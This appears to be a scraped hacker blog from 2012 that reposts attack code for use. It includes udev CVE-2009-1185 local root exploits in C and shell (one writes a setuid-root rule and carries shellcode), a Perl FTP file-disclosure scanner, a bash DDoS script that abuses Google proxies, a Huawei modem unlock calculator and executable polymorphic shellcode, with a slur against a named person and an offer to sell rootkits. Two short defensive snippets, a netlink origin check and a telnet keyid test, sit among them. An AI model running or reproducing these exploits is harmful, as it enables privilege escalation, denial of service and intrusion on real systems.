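                if (j + 1 >= n) { j = n; break; }
                if (s[j + 1] == TN_SE) { j += 2; break; }
                j++;  /* IAC IAC is one literal 0xff; any other IAC x counts as x */
            }
            if (datalen == 0) sub = s[j];          /* first byte: subcommand */
            datalen++;
            j++;
        }
        if (opt == TELOPT_ENCRYPT && datalen >= 1 &&
            (sub == ENC_KEYID || sub == DEC_KEYID)) {
            size_t keyid_len = datalen - 1;
            if (keyid_len > *longest) *longest = keyid_len;
            if (keyid_len > KEYID_LIMIT) hits++;
        }
        i = j;
    }
    return hits;
}

/* Constructed test input only: IAC SB ENCRYPT ENC_KEYID <keyid> IAC SE with
 * keyid_len filler bytes; 0xff filler is doubled as the protocol requires.
 * out must hold 6 + 2 * keyid_len bytes. */
size_t make_keyid_subopt(uint8_t *out, size_t keyid_len, uint8_t fill)
{
    size_t n = 0, k;
    out[n++] = TN_IAC; out[n++] = TN_SB;
    out[n++] = TELOPT_ENCRYPT; out[n++] = ENC_KEYID;
    for (k = 0; k < keyid_len; k++) {
        if (fill == TN_IAC) out[n++] = TN_IAC;
        out[n++] = fill;
    }
    out[n++] = TN_IAC; out[n++] = TN_SE;
    return n;
}

int main(void)
{
    uint8_t buf[256];
    size_t longest, n, hits;

    n = make_keyid_subopt(buf, 8, 'A');            /* ordinary short key id */
    hits = count_oversize_keyids(buf, n, &longest);
    printf("short:    hits=%zu longest=%zu\n", hits, longest);

    n = make_keyid_subopt(buf, 79, 'A');           /* 63 + 4 * 4 bytes, the size of struct key_info above */
    hits = count_oversize_keyids(buf, n, &longest);
    printf("oversize: hits=%zu longest=%zu\n", hits, longest);
    return 0;
}
```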

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope bversion and the Undergroun bash version , have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

Thats the Underground one wich is nice and neat,fast and furiouz :>
Enjoy them all, old now anyhow..
XD

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jono's code! Yes, when it is neater and nicer than the alternatives of course, but NOT when they're crippled :) k thx. So, this is being posted now, a bit late but, better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}

XD
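The check whose absence the exploit's header comment describes, shown from the receiving side as an added example (not code from the original post, from Jon Oberheide, or from the udev project): a uevent datagram is accepted only when the kernel-supplied sender credentials show uid 0 and the netlink source port id is 0. The names `uevent_origin`, `check_sample`, `struct peer_cred` and the `UEV_*` verdicts are hypothetical, and the sample messages are constructed in memory rather than read from a socket.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#ifndef SCM_CREDENTIALS
#define SCM_CREDENTIALS 0x02   /* glibc only exposes it with _GNU_SOURCE */
#endif
/* Same layout as struct ucred, declared locally for the same reason. */
struct peer_cred { pid_t pid; uid_t uid; gid_t gid; };
enum verdict { UEV_OK, UEV_NO_CRED, UEV_NOT_ROOT, UEV_NOT_KERNEL };

/* Classify a datagram returned by recvmsg() on a NETLINK_KOBJECT_UEVENT socket
 * with SO_PASSCRED enabled. The kernel fills in both fields, not the sender. */
enum verdict uevent_origin(struct msghdr *msg)
{
    const struct sockaddr_nl *from = msg->msg_name;
    struct cmsghdr *cm;
    struct peer_cred cred;

    for (cm = CMSG_FIRSTHDR(msg); cm != NULL; cm = CMSG_NXTHDR(msg, cm))
        if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_CREDENTIALS &&
            cm->cmsg_len >= CMSG_LEN(sizeof cred))
            break;
    if (cm == NULL) return UEV_NO_CRED;        /* no sender credentials attached */
    memcpy(&cred, CMSG_DATA(cm), sizeof cred);
    if (cred.uid != 0) return UEV_NOT_ROOT;    /* sent by an unprivileged process */
    if (from == NULL || msg->msg_namelen < sizeof *from ||
        from->nl_family != AF_NETLINK || from->nl_pid != 0)
        return UEV_NOT_KERNEL;                 /* kernel messages carry port id 0 */
    return UEV_OK;
}

/* Constructed sample: build the msghdr recvmsg() would hand back for a
 * sender with the given netlink port id and uid, then classify it. */
enum verdict check_sample(unsigned nl_pid, uid_t uid, int with_cred)
{
    union { char buf[CMSG_SPACE(sizeof(struct peer_cred))]; struct cmsghdr a; } ctl = { { 0 } };
    struct sockaddr_nl src = { .nl_family = AF_NETLINK, .nl_pid = nl_pid };
    struct peer_cred c = { (pid_t)nl_pid, uid, 0 };
    struct msghdr msg = { .msg_name = &src, .msg_namelen = sizeof src };

    if (with_cred) {
        msg.msg_control = ctl.buf;
        msg.msg_controllen = sizeof ctl.buf;
        struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
        cm->cmsg_level = SOL_SOCKET;
        cm->cmsg_type = SCM_CREDENTIALS;
        cm->cmsg_len = CMSG_LEN(sizeof c);
        memcpy(CMSG_DATA(cm), &c, sizeof c);
    }
    return uevent_origin(&msg);
}
int main(void) { return check_sample(1234, 1000, 1) == UEV_NOT_ROOT ? 0 : 1; }
```

A real receiver would enable `SO_PASSCRED` with `setsockopt()` before calling `recvmsg()`, and drop any datagram for which the verdict is not `UEV_OK` before parsing its key=value fields.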

G6 FtpServer file disclosure vuln script [some perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 Ftp Server file disclosure vulnerability script here, for anyone fuzzing with G6…. seems to be a very big userbase with windows for sure..
ENJOY!

######HAXNET
#!/usr/bin/perl
# G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## added usb thumb/sdcard/miscro-hubs etc support and laptop/ipad
$port = 21;
$login = 'anonymous';     ## change this if want but this is good for Fingerprint on ranges...with me
$pass = 'anonymous';      ## again this should be changed like sometimes its user@localhost.net ,idk
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;

sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## added a cpl here wich were missing, could also be updated more..
foreach $drive (@drives) {
foreach $dir (@win_dirs) {
print ".";
print $sock "SIZE /$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
return("$drive:\\$dir");}
}
}
return("[x] Not found");
}

sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
foreach $drive (@drives) {
foreach $file (@iis_files) {
print ".";
print $sock "SIZE /$drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF

TOOL: [Lame] +DDoS Against Webservers by IHTeam (Actual CVE bug ddos) BASH SCRIPTFILE

Posted on 6th January 2012 in Exploits

g+ dd0s attack against apache and other webservers.. forgot the exact ones…. lame but, was not publicly put out there well.. so fixed cpl typos and rlsd it on CC… njoy skids :P ~
xd caters for all ppls needs :P

#!/bin/bash
# Bug found by Simone 'R00T_ATI' Quatrini,Mauro 'epicfail' Gasperini
# Site: http://www.ihteam.net

function start {
echo "[*] Sending `echo $2` Requests .."
for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done
echo "[*] Still attacking `echo $urlclear`"
echo "[*] Sleeping for 10Secs"
sleep 10
start url $2 urlclear
}
echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''
if [ "$#" -lt 2 ]; then
echo "Usage: $0 <Big file> <Requests>"
echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
echo ""
exit 0
fi
case $2 in *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac
echo "Attacking -> $1"
match1=/
repl1=%2F
match2=:
url=$1
urlclear=$1
url=${url//$match1/$repl1}
url=${url//$match2/$repl2}
echo ""
echo "[*] Loop started! CTRL+C to stop .."
echo ""
start url $2 urlclear

Have phun
XD / #HAXNET@EF

Huawei E585 and Other Huawei modem unlock code calculator v1.1

Posted on 6th January 2012 in Android, Codes, Papers

This was being searched for by me for ages.. finally was able to get hold of some older code and play around with stack values, i will be adding a targets base to it soon, but for now, enjoy, thx to gunslinger for this, it was really needed, and, since i don't cover phone shit at all so far, please read on.. this rocks, it really does, and, this is from personal use with this device the E585 only, it is a very very good thing to get to use if you can… for me, it was 28bux and, I'm unlocked :D
Enjoy
xd @ #haxnet / efnet
DONT become a victim!

#!/usr/bin/python
#   Gunslinger <yudha.gunslinger@gmail.com> http://bit.ly/c0debreaker
import hashlib, string

__auth__      = "[MULTIPLE PPL]"
__date__      = "DEC 2011"
__version__   = "1.1"
__copyright__ = "Copyright (c) 2011"

class huawei_modem_unlocker(object):
    """
    Instance variables:
    Imei
        Imei of the modem will be calculated
        Default : '0'
    Verbose
        Display how algorithm Is working
        Default : False
    """

    def __init__(self, imei='0', verbose=False):
        ''' Huawei modem unlocker class constructor '''
        self._imei      = imei
        self._verbose   = verbose
        self._md5u      = hashlib.md5(str(imei)+str('5e8dd316726b0335')).hexdigest()
        self._md5f      = hashlib.md5(str(imei)+str('97b7bc6be525ab44')).hexdigest()
        self._unlock_code   = ''
        self._flash_code    = ''
        self._width     = 21
        self._w         = 10
        self._header_format     = '%-*s%*s'
        self._format            = '   %d  | %-*s | %*s  '

    def xor_digits(self, source, counter):
        ''' Get a value and xoring it during looping iteration '''
        digits = int('0x0'+source[0+counter:2+counter],16)  ^ \
                 int('0x0'+source[8+counter:8+2+counter],16)    ^ \
                 int('0x0'+source[16+counter:16+2+counter],16)  ^ \
                 int('0x0'+source[24+counter:24+2+counter],16)
        return digits

    def calc(self):
        ''' Process calculate with the algorithm (read teh code) '''
        cnt = 0
        cnt2 = 1
        if self._verbose:
            print "="*(self._width+13)
            print " Iter."+"|"+ " Unlock byte "+"|"+" Flash byte "
            print "-"*(self._width+13)
        while cnt < 8:
            digits_unlock = self.xor_digits(self._md5u, cnt)
            digits_flash = self.xor_digits(self._md5f, cnt)
            unlock_byte = string.zfill(hex(digits_unlock)[2:],2)
            flash_byte = string.zfill(hex(digits_flash)[2:],2)
            self._unlock_code = str(self._unlock_code)+str(unlock_byte)
            self._flash_code = str(self._flash_code)+str(flash_byte)
            if self._verbose: print self._format % (int(cnt2), self._width - self._w, self._unlock_code , self._w, self._flash_code)
            cnt  +=2
            cnt2 +=1
        if self._verbose:
            print "="*(self._width+13)
            print "\nUNLOCK CODE = %d & %d | %d = %d" % (int('0x0'+self._unlock_code,16), 33554431, 33554432, eval("int('0x0'+self._unlock_code,16) & 33554431 | 33554432"))
            print "FLASH CODE    = %d & %d | %d = %d\n" % (int('0x0'+self._flash_code,16), 33554431, 33554432, eval("int('0x0'+self._flash_code,16) & 33554431 | 33554432"))
        self._unlock_code   = int('0x0'+self._unlock_code,16) & 33554431 | 33554432
        self._flash_code    = int('0x0'+self._flash_code,16) & 33554431 | 33554432
        return (self._unlock_code, self._flash_code)

    def run(self):
        ''' Fire it up ! '''
        self.calc()
        return (self._unlock_code, self._flash_code)

if __name__ == '__main__':
    print "\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __auth__)
    inpimei = raw_input("Please input modem IMEI: ")
    cracker = huawei_modem_unlocker(inpimei)
    a, b    = cracker.run()
    print "\n-> IMEI           = %s" % (inpimei)
    print "->   UNLOCK CODE    = %s" % (a)
    print "->   FLASH CODE     = %s" % (b)

Now that's what you would call awesome :> , you won't find this too easy again my friends.. pocketwifi is now unlockable at ALL levels so, please enjoy it… free, thanks to some smart reversing of hardware by gunslinger, props for this and thanks.. when all others failed, gslinger came thru for me :>
thanks to my channel on efnet and its members @ps and friends.. and, please, feel free to pop in anytime.. Now, note, this unlocks the modem so, you could now use it alongside your own isp and, thus you would have free wifi i believe… but, also note, this can handle an Android-ROM! Yes, or even, Ubuntu installed within it! On the e585, and other models, above it, have an awesome feature to add a shared sdcard, so users logged in, can actually share like a ftpd!
These wifi routers really do rock, i would not have gone thru this amount of crap to get a calculator happenin for this thing, and, have to now maybe check other models and update a few strings…. so, it might have a target list next time you see it :)
Again, this will handle a rom, or, work like a small os/router, and this means, you have basically, a 5 user (at the least) shell, and, that's only if you wish to allow 4 others on it, you could happily, connect thru it with your own shit.. that's even very good reason to have this thing unlocked, it really works on, what phone isp is being used to access it, when it is unlocked, this means, no restrictions on any of its default.rules, which are nice and changed by default on unlock.. so, you could make a py object file? or a .pyc ? or just python file.py on the device sdcard, root of sdcard… just hook it up to the pc, copy file to its sdcard and root then, enjoy rom manager possibly? and, i know for fact it handles froyo rom, so that maybe where to start searching on that one :>
ENJOY PPL!
XD @ #HAXNET @ EFNET // Dont become a victim ..

Shellcode: 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode

Posted on 6th January 2012 in Codes, Exploits

SHELLCODE CODE BELOW:

Just some nice people/coders stuff,awesome polymorphic generator… (btw soon will put back up the linux and bsd polymorphic portbind i have here somewhere from old website… anyhow…enjoy this shellcode, it is ubercool for stack leaks maybe to ;) or leveraging from one code type to another ? idc…your the coders here…btw, I would still probably be in the Coders comp, albeeit half entrants being of abit shifty and sideways attidtudes..peicllly the socalled nice guys…anyhow.. anyjoy the shit.. this shit, dont go to FD…and, thats why CC will NEVA ever, bow to bs like that crap… and fy0d0r , go funk yaself, for the backups my shit gave to you and, proper, hard and good solid fucking help…go screw yaself fag…this is second time you have faggoted about like that, i should pay you a nice slapping.
Anyhow.. enjoy the shellcode.. spit on lamer.. /me spitting hard.

////Untouched author code..works fine -xd tested

/*
Title  : Find all writeable folder in filesystem linux polymorphic shellcode
Name   : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode .
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>

char shellcode[] =
   "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
   "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
   "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
   "\xb5\x96\x1d\x29\x34\x34\x34\x9b\x9e\xa3\x99\x55\x64\x55\x62"
   "\xa9\xae\xa5\x9a\x55\x99\x55\x62\xa5\x9a\xa7\xa2\x55\x6c\x6c"
   "\x6c";

int main(void) {
fprintf(stdout,"-> Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}

End 1337 shellcode and, i aint kidding it is fucking leet, and, it is coded for a REASON so, please, for those who think it is crap, wonder, why it was actually prvate shellcode for like, 2009 or so…fucking,….have to give these things out every now and then and, times are here….many links also, in my channel on efnet, of rootkits, other apps and, skynet kits etc, all the ‘leet’shit.. ill sell it, for, we will discuss this…maybe on efnet.
CHEERS!
XD
#HAXNET , #HAXSHELLS , #MAGUCSHELLS ,and cheers to the leet of the leet who are the @ps in #Haxnet, you want leet, you got it… bitchez.
Now go make something useful…ftw.
XD v2